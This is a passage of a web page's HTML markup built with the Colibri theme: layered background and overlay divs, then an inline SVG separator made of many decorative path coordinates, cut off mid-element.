class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container-md\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n      <div class=\"background-layer background-layer-media-container\">\n        <!---->\n        <div class=\"overlay-layer\">\n          <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n          <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n        </div>\n      </div>\n    </div>\n    <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n      <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n        <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n        <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n        <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n        <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n        <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n        <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n        <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n        <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n        <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n        <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n        <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n        <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n        <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n        <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n        <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n        <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n        <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n        <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n        <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n        <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n        <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n        <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n        <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n        <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n        <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n        <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n        <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n        <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n        <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n        <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n        <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n        <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n        <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n        <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n        <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n        <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n        <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n        <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n        <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n        <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n        <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n        <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n        <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n        <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n        <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n        <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n        <path d=\"M147.8,78.4c1.8-.3-4.9-.2-4.5-.4,6.3-.1-3.5-.6,2.3-.6-2.7,0-3.2-.2-5.8-.2.5.9,3.7,1.5-1.1,1.9,4.5.4,2,1.2,7,1.6,0-.5,1.5-1.1-1.6-1.8,1.4-.2,6.1.4,5.5-.1C146.3,78.7,142.1,78,147.8,78.4Z\"></path>\n        <path d=\"M317,84.4c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C315.3,84.2,312.8,84.2,317,84.4Z\"></path>\n        <path d=\"M265.7,81.4c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C267.7,82.1,268.8,81.5,265.7,81.4Z\"></path>\n        <path d=\"M182.7,80.2c-4.1-.3-1.3-1-6.7-1.2C177.3,79.3,176.1,79.8,182.7,80.2Z\"></path>\n        <path d=\"M238.5,80.4c1.8.3-3.8.4.6.7-1-.4,3.6-.2,3.8-.5C240.9,80.6,239.7,80.5,238.5,80.4Z\"></path>\n        <path d=\"M335.4,83.2c4.5.2,7.8-.1,3.9-.4C338.9,83,333.8,82.8,335.4,83.2Z\"></path>\n        <path d=\"M118,77.6a10.17,10.17,0,0,1-2.7,0q0,.45,3.3.6C116.8,78,122.4,77.9,118,77.6Z\"></path>\n        <path d=\"M126.7,78c3.7.1,4.6.4,8.8.5-.2-.3-1.8-.6-4.8-.8C130.7,78,126,77.8,126.7,78Z\"></path>\n        <path d=\"M308.8,81.4c-.8.3-1,.4,2,.7-1.6-.4,3.5-.1,3.9-.3C310.3,81.8,311.1,81.5,308.8,81.4Z\"></path>\n        <path d=\"M246.7,80.3c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C253.5,80.5,245.4,80,246.7,80.3Z\"></path>\n        <path d=\"M173.5,77.7c5.8.1,1,.9,5.1,1.1,1.8-.6,3.6-1.6-3.4-2.3-4.1.2,3.1.7,2.4,1.1A37.48,37.48,0,0,0,173.5,77.7Z\"></path>\n        <path d=\"M315.9,81.5c0-.3,2.2-.4,2.1-.7C314.1,80.7,312.8,81.3,315.9,81.5Z\"></path>\n        <path d=\"M351.3,82.2c.3-.4,1.3-.5-3.4-.7C348.9,81.7,346.2,82.2,351.3,82.2Z\"></path>\n        <path d=\"M220.8,79.3c.6-.2,3.2-.2,2.2-.6C219.9,78.7,215.9,79.1,220.8,79.3Z\"></path>\n        <path d=\"M152.4,77.3c1.7-.3,1.1-.6-3.5-.8C149,76.8,150,77.1,152.4,77.3Z\"></path>\n        <path d=\"M347.3,79.3c-5-.2-2.6.8-.6.9C349,79.9,345.9,79.7,347.3,79.3Z\"></path>\n        <path d=\"M139.5,75.2c3.9,0,3.8.2,7.2.3C147.6,75.1,139.3,74.8,139.5,75.2Z\"></path>\n        <path d=\"M172.1,74.5c2.1.1,2.6.2,4.5.3-2.4-.6-2-.8-3.9-1.3C172.9,73.9,170.7,74,172.1,74.5Z\"></path>\n        <path d=\"M130.5,72.9c1,.3,3.1.5,4.8.8C135.1,73.3,135.5,72.9,130.5,72.9Z\"></path>\n        <path d=\"M390.3,79.2c-.3-.4,3.6-.4,5-.7C389,78.2,386.2,78.8,390.3,79.2Z\"></path>\n        <path d=\"M218.2,74.8c4.3.1,5.6-.7,1.9-1C221.2,74.2,214.3,74.4,218.2,74.8Z\"></path>\n        <path d=\"M177.5,72.7c.3.3.5.6.8.9C183.5,73.7,183.6,72.9,177.5,72.7Z\"></path>\n        <path d=\"M149.2,72.1c-3.4-.1-3.5-.4-6.1-.6,1.5.6,1.7,1.2,8.3,1.5C152,72.6,143.3,72.2,149.2,72.1Z\"></path>\n        <path d=\"M128,71.6c3.6-.2-3.4-.8.5-1-3.8,0-3.1-.3-5.9-.4C125.5,70.9,122.7,71.1,128,71.6Z\"></path>\n        <path d=\"M146.2,70.3c-4.5-.1-2.4.4-5.2.4,3.4.1,1.8.5,4.7.7a11.09,11.09,0,0,1,2.7,0c-3.1-.6,1.1,0,2.4-.4C146.9,70.6,144,70.8,146.2,70.3Z\"></path>\n        <path d=\"M431.6,77.4a4.41,4.41,0,0,0,1.6.3c.9-.3-4.5-.8-6.1-.6C430.2,77.2,428,77.6,431.6,77.4Z\"></path>\n        <path d=\"M407.6,76.8c.4-.3,4.1-.4,3.5-.8C407.2,76,405.6,76.7,407.6,76.8Z\"></path>\n        <path d=\"M315.5,74.8c.8-.4-3.7-.6-.7-.8C310.2,73.7,311.1,74.8,315.5,74.8Z\"></path>\n        <path d=\"M229.6,72c1.7.1,4,.1,4.4.2s0,.3,1.7.4c1.7-.3-1.2-.6-3.6-1C231.6,71.7,227.7,71.6,229.6,72Z\"></path>\n        <path d=\"M144.8,70.2c-2.6-.4,5.6-.3.8-.6-1.3.1-2.6.2-4,.2.2-.2-.7-.4-3.2-.5-.4.3,3.5.5.6.7A53.44,53.44,0,0,1,144.8,70.2Z\"></path>\n        <path d=\"M421.4,75.2c-4.3-.1-5.3.1-8.2.1a10.34,10.34,0,0,0,3.3.6C416.9,75.6,422.5,75.7,421.4,75.2Z\"></path>\n        <path d=\"M380.2,74c-.8.3-1.1,1,5.2,1.2C383.3,74.9,382.7,74.4,380.2,74Z\"></path>\n        <path d=\"M372.6,75c0-.3,5.4-.6,2-.8-1.6.4-.5-.3-3-.3-.8.3-.2.8-4.7,1C370.8,74.9,369.7,74.7,372.6,75Z\"></path>\n        <path d=\"M441.1,75.5a45.38,45.38,0,0,0,4.9.9C448.4,76.2,447.3,75.5,441.1,75.5Z\"></path>\n        <path d=\"M152,69c-1.1.2-5.6,0-3.8.5,2.1,0,5.3.2,5.6,0-1.1-.1-2.8-.1-2.9-.2C150.6,69.2,156.8,69.2,152,69Z\"></path>\n        <path d=\"M366.4,74.2c-1-.3,5.6-.5-2-.7C365.4,73.7,363.2,74.1,366.4,74.2Z\"></path>\n        <path d=\"M126.5,68.3c.3.1,0,.3,1.7.4.2-.3,4.1-.2,5.3-.3C130.2,68.3,128,68.3,126.5,68.3Z\"></path>\n        <path d=\"M405.8,74.7c2.5-.2,5-.1,2.3-.5C404.5,74.1,402.6,74.6,405.8,74.7Z\"></path>\n        <path d=\"M154.1,68.3c-.2.2-5.2,0-5.4.2,5.2,0,2.6.5,7.4.5C155.2,68.8,157.3,68.4,154.1,68.3Z\"></path>\n        <path d=\"M188.2,69.1c-7.4-.3-2.7.8.4.4C185,69.4,187.8,69.1,188.2,69.1Z\"></path>\n        <path d=\"M450,74.5c1,.4,2.4.7,6.4.9A26.64,26.64,0,0,0,450,74.5Z\"></path>\n        <path d=\"M142.7,67.8c.6.2,12.2.6,7.1.2,0,.1-.1.1-1.3.1-.3-.1,0-.3-1.7-.4C146.8,67.9,142.9,67.7,142.7,67.8Z\"></path>\n        <path d=\"M184.6,68.1c-6.5,0-5.1.1-8.7-.4-.3.3-.2.4-3.7.6,4.4.2,5.8.1,10.1.4,1.5-.1,1.4-.2-.4-.4C183.6,68.3,185.2,68.3,184.6,68.1Z\"></path>\n        <path d=\"M153.3,67.3c-4.5-.2-5.7,0-6.8.2,2.5,0,4.4.1,5.8.2C151.7,67.5,153.6,67.5,153.3,67.3Z\"></path>\n        <path d=\"M287.9,70.2c-3-.2-5.8-.4-8.8-.5C278.3,70,286.9,70.4,287.9,70.2Z\"></path>\n        <path d=\"M409.8,73c.8-.3,1.6-.6-2.1-.8C409.2,72.6,404.2,72.7,409.8,73Z\"></path>\n        <path d=\"M47.3,63.6c-.3.3-3.9.2-3.7.6C46.9,64.2,51,63.9,47.3,63.6Z\"></path>\n        <path d=\"M126.3,64.9a22.4,22.4,0,0,0,4.8.8c-.1-.1,2.4,0,2.7-.2C129.7,65.4,130.9,65,126.3,64.9Z\"></path>\n        <path d=\"M45.5,63.1a23.75,23.75,0,0,1,2.8.1c-1-.4,3-.6-3.5-.8-.2.4,3.1.6-.8.6C44.8,63,45.6,63,45.5,63.1Z\"></path>\n        <path d=\"M337.1,69.4c-2.2-.5,4.5-.2,5.2-.4C338.5,68.4,330.4,69.2,337.1,69.4Z\"></path>\n        <path d=\"M267.4,65.9a10.66,10.66,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3C264.3,66.9,272.2,66.3,267.4,65.9Z\"></path>\n        <path d=\"M49.3,61.1c-5-.2-1.1.5-5.2.4,2.2.2,6.4.2,6.1.6-3.8,0-3-.3-5.9-.4.8.6,7.8.6,10.1.3C50,61.9,49.2,61.6,49.3,61.1Z\"></path>\n        <path d=\"M411.5,70.2c.8,0,2.9-.5-.5-.6a15.43,15.43,0,0,1-2.8-.1C408.2,69.8,409.3,70,411.5,70.2Z\"></path>\n        <path d=\"M127.1,62.8c-2,.1-8.6.3-3.6.7C121.5,63,131.3,63.1,127.1,62.8Z\"></path>\n        <path d=\"M242.9,64.9c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C245.7,65.1,247.4,65.1,242.9,64.9Z\"></path>\n        <path d=\"M254.7,65.6c2,.1,2.5.2,4.4.3-2.4-.5-.6-.7.4-1.1C255,64.9,253.7,65.1,254.7,65.6Z\"></path>\n        <path d=\"M408.6,68.5c-.3,1.1,21.2.6,9.6-.1-1.9,0,2.3.6-2.3.6C413.4,68.8,411.6,68.6,408.6,68.5Z\"></path>\n        <path d=\"M312.4,66.5c.8-.4-2.8-.5-4.9-.8C304.3,66,309.5,66.3,312.4,66.5Z\"></path>\n        <path d=\"M214.1,63.7a54.5,54.5,0,0,0-7,0c2.3.1,1.1.3,3.1.4.1-.1-.5-.3,1.1-.3C213.1,63.9,214.4,64,214.1,63.7Z\"></path>\n        <path d=\"M345.5,66.3c-.6-.3-4.5.8.7.8C349.2,66.9,344.7,66.6,345.5,66.3Z\"></path>\n        <path d=\"M255.4,64.9c2.3-.2-.1-1-3.4-.7C256.5,64.4,249,64.7,255.4,64.9Z\"></path>\n        <path d=\"M365.6,66.9c-4,.1-13.3-.4-14-.1C353.2,66.8,366.6,67.6,365.6,66.9Z\"></path>\n        <path d=\"M149.8,61.8c-.4.3,2.2.5,4.7.7C154.5,62.1,154.2,61.8,149.8,61.8Z\"></path>\n        <path d=\"M106.4,61.3c-2.3-.4,5.9-.4.7-.7.3.2-.9.2-2.7,0C105.4,60.8,103.3,61.2,106.4,61.3Z\"></path>\n        <path d=\"M335.9,66.4c4.3.2,5.7-.3,2.3-.5C337.8,66.1,335.4,66.1,335.9,66.4Z\"></path>\n        <path d=\"M65.7,59.3c1.9.6-.8.7,3.7,1.1C69.3,60,68.7,59.6,65.7,59.3Z\"></path>\n        <path d=\"M56.2,59.5c4.4.1,4.7.5,7.6.7C65.4,59.8,58.3,59.3,56.2,59.5Z\"></path>\n        <path d=\"M59.6,57.1c-2.1,0-5.3-.2-5.6,0,6.7.2,3.9.9,8.1,1.3,1-.4,6.1.4,1.8.5,1.9,0,3.1.1,4.3.2,2.3-.1-1.6-.4-.7-.8C60.9,58.1,63.4,57.4,59.6,57.1Z\"></path>\n        <path d=\"M38.7,57c2.2.5.4,1.2,6.8,1.5C39.5,57.8,46.5,57.5,38.7,57Z\"></path>\n        <path d=\"M116.7,58.8c4.6.5,2.4,1,6.6,1.2-2.1-.5,1.9-.4,2.2-.7C120.5,59.3,121.1,58.9,116.7,58.8Z\"></path>\n        <path d=\"M105.5,58.7c.1.4,5.3.5,7.6.7A53.68,53.68,0,0,0,105.5,58.7Z\"></path>\n        <path d=\"M269.6,62c2.2.4-7,.5.7.8C268.8,62.5,274,62.3,269.6,62Z\"></path>\n        <path d=\"M151.7,59.2a15.43,15.43,0,0,0,4.9.8C153.3,59.5,158.6,59.4,151.7,59.2Z\"></path>\n        <path d=\"M332.9,62.9c.4.3,1.3.5,3.4.7,1.6-.2-.4-.2.9-.5C335.3,63.1,334,63,332.9,62.9Z\"></path>\n        <path d=\"M253.4,61c2,0,3.2.1,4.4.2,0-.1.2-.3,2.6-.2a9.4,9.4,0,0,0-3.2-.5A19.4,19.4,0,0,1,253.4,61Z\"></path>\n        <path d=\"M104.2,57.2a34.16,34.16,0,0,0-6.7.3C102.2,57.7,104.2,57.5,104.2,57.2Z\"></path>\n        <path d=\"M33.6,54.3c3.4.5-.7,1,3.9,1.3C35.6,55,41.5,54.6,33.6,54.3Z\"></path>\n        <path d=\"M140.1,57c7.7.1,4.9-.6.5-1C142,56.5,139.8,56.6,140.1,57Z\"></path>\n        <path d=\"M344,61.3c1.8-.1,8.3-.4,2.1-.7,1.1.3-.2.4-4,.2C342.5,61,342,61.2,344,61.3Z\"></path>\n        <path d=\"M88.8,53.9c2.3.5-2.1,1.3,2.6,1.4C89.3,54.7,94.7,54.3,88.8,53.9Z\"></path>\n        <path d=\"M193.6,56.3a38.23,38.23,0,0,0,6.3.8C199.3,56.7,198.3,56.4,193.6,56.3Z\"></path>\n        <path d=\"M95.7,53.9a9.77,9.77,0,0,0-3.5-.8C90.8,53.1,92.2,53.7,95.7,53.9Z\"></path>\n        <path d=\"M343.9,58.2c-3.5-.1-6.8-.1-8.6-.3,1.9.3,6.3.5,9,.7C344.2,58.5,344.1,58.3,343.9,58.2Z\"></path>\n        <path d=\"M200.4,54.5c-1.8.1-2,.7,2.1.8C199,54.9,204.1,54.8,200.4,54.5Z\"></path>\n        <path d=\"M306.6,56.8c.2.3,1.2.6,3.5.8C309.6,57.3,310.7,56.9,306.6,56.8Z\"></path>\n        <path d=\"M298.8,55.8c.9.5-4.5,0-7,0-.6.2-2.7.3-3.8.5,4.2-.2,14.1.2,16.5-.2C302.1,56,300.1,55.9,298.8,55.8Z\"></path>\n        <path d=\"M204.6,53.1c-5,0-.6-.7-6.2-.7C198.2,52.7,202.3,53.3,204.6,53.1Z\"></path>\n        <path d=\"M110.7,50.4a52.3,52.3,0,0,0-5.6,0c0,.3.2.5,3.3.6C107.5,50.6,110.1,50.6,110.7,50.4Z\"></path>\n        <path d=\"M308,55.2c-1.5-.6-7.4-1.1-1-1.1-4.2-.3-11.5-.3-14.5-.7l.2.2c4.2.2,8,.5,10.4.8C297.7,54.4,304.6,55,308,55.2Z\"></path>\n        <path d=\"M265.3,54.1c4.3.2,5.7-.3,2.3-.5C267.3,53.8,263.8,53.7,265.3,54.1Z\"></path>\n        <path d=\"M29.6,48.2c.9.2-1.2.5,1.9.6C32.3,48.6,36.7,48.4,29.6,48.2Z\"></path>\n        <path d=\"M333.9,54.7c-2.8.1-.5.9,3.6,1C337.4,55.1,338.3,55,333.9,54.7Z\"></path>\n        <path d=\"M113.1,49.9c-.4.3,1.7.5,6,.6C120.5,50.1,115,50.1,113.1,49.9Z\"></path>\n        <path d=\"M345.4,55c-1.9-.1-2.8-.2-5.8-.2.2.2.3.4.5.6C343.7,55.4,345.4,55.3,345.4,55Z\"></path>\n        <path d=\"M134.1,50.2c3,.1.8.5,4.4.3.3.1,0,.3,1.7.4C144.3,50.7,135.5,50,134.1,50.2Z\"></path>\n        <path d=\"M343.3,54.2c-4.7-.2-.8.3-5.5.1-.4-.2.2-.4-1.8-.5.2.2.3.4.5.6,2.1.1,3.7.2,5.9.4C340.9,54.4,344.1,54.5,343.3,54.2Z\"></path>\n        <path d=\"M281.2,53.1c-2.1-.2-.1-.7-4.8-.8C276.7,52.7,276.8,53.1,281.2,53.1Z\"></path>\n        <path d=\"M266.4,52.2c-2.5,0-4.4-.1-5.8-.2,1.8.2,4.6,1,7.6.7C266.1,52.6,266.7,52.3,266.4,52.2Z\"></path>\n        <path d=\"M165.1,49.1c-.9,0-1.7,0-1.3.1,3.8.2.9.7.8.9,4.8,0,3.9-.4,6.4-.6-5.2-.1-3.4.1-3-.3C166.9,49.2,166,49.1,165.1,49.1Z\"></path>\n        <path d=\"M356.2,53.1c-1.9-.1-2.8-.2-5.8-.2q0,.45,3.3.6C353.5,53.2,357.5,53.4,356.2,53.1Z\"></path>\n        <path d=\"M280.7,51.1c-3.1,0-4.9.1-5.3.3,2,0,3.2.1,4.4.2C278.3,51.2,281.5,51.3,280.7,51.1Z\"></path>\n        <path d=\"M304.1,50.8c-3.5,0-5.6.1-8.2.1,2.1.1,1.5.3,1.8.5,2,.2,5.3.2,7.3.4l-.4-.4a36.81,36.81,0,0,1-4.2-.1l-.2-.2C302.8,51.3,305.1,51.2,304.1,50.8Z\"></path>\n        <path d=\"M352.3,51.9c-4.7-.1-5.3.2-6.5.5,2.6,0,3.2.2,5.8.2C350.5,52.2,349.2,52.1,352.3,51.9Z\"></path>\n        <path d=\"M289.7,50.2c-4.5,0-2.3-.4-5.9-.5C282.9,50.1,288.5,50.6,289.7,50.2Z\"></path>\n        <path d=\"M362.9,51.3c-4.3,0-4.3-.3-8.6-.3C354.5,51.3,363.5,51.6,362.9,51.3Z\"></path>\n        <path d=\"M344.4,50.7c3.4-.3-.7-1.2,4.4-1.3,0-.3-2.5-.4-4.6-.5C347.9,49.5,339.4,50.2,344.4,50.7Z\"></path>\n        <path d=\"M363.6,50.5c-4,.1-9.2.1-2.4.4.1.1.3.1,1.5.1C361.3,50.7,364.5,50.8,363.6,50.5Z\"></path>\n        <path d=\"M356.6,48.8c.3.3-2.2.3-.8.6,3.5.1,6.9.2,6.9-.1-1.7-.1-4-.1-4.4-.2A4.48,4.48,0,0,0,356.6,48.8Z\"></path>\n        <path d=\"M341.9,48c.8.2.9.5,4.6.5C349,48.4,345.8,48.1,341.9,48Z\"></path>\n        <path d=\"M349.2,48.3c1.9,0,3.8.1,5.7.1-.2-.2-.3-.4-.5-.6C349.1,47.7,348.3,48,349.2,48.3Z\"></path>\n        <path d=\"M38.1,40.6c-4.5-.1-7.1.3-2.3.5C34.4,40.7,39.5,40.9,38.1,40.6Z\"></path>\n        <path d=\"M294.9,46.7c6.2.2,3.3-.4,3.5-.8C291.1,45.8,297.4,46.3,294.9,46.7Z\"></path>\n        <path d=\"M354.2,47.7c1.4-.2,4.4-.3,5.1-.5C355.5,47.1,350.1,47.4,354.2,47.7Z\"></path>\n        <path d=\"M259.6,44.5c5.7-.1,11.3.5,15.6.4-4.3-.2,1.2-.2-.4-.4-4.4-.1-8.4.2-11.3-.3C264.2,44.4,258.1,44.1,259.6,44.5Z\"></path>\n        <path d=\"M376.3,46c-3.7,0,.8-.6-4.6-.5,1.9.4,1.2.4-2.3.5a32.29,32.29,0,0,0-4.5-.4c2.3.5,6.6.7,3.7,1.1,1.7.1,3.9.2,7.2.3,1.1-.4-5.5-.3-4.7-.7A34.73,34.73,0,0,0,376.3,46Z\"></path>\n        <path d=\"M299.8,44.3c-1.1.1-3.1.7,2,.7C298.8,44.6,303.5,44.6,299.8,44.3Z\"></path>\n        <path d=\"M278.3,43.6c6.4,0,4.8.5,8.9.6-.9-.7,4.9-1-1.3-1.4.6.4-2.1.4-.6.9C283.3,43.6,277.9,43.3,278.3,43.6Z\"></path>\n        <path d=\"M337.4,44.4c-1.1.1-3.1.9,2.2.9C335.9,44.9,341.5,44.7,337.4,44.4Z\"></path>\n        <path d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path 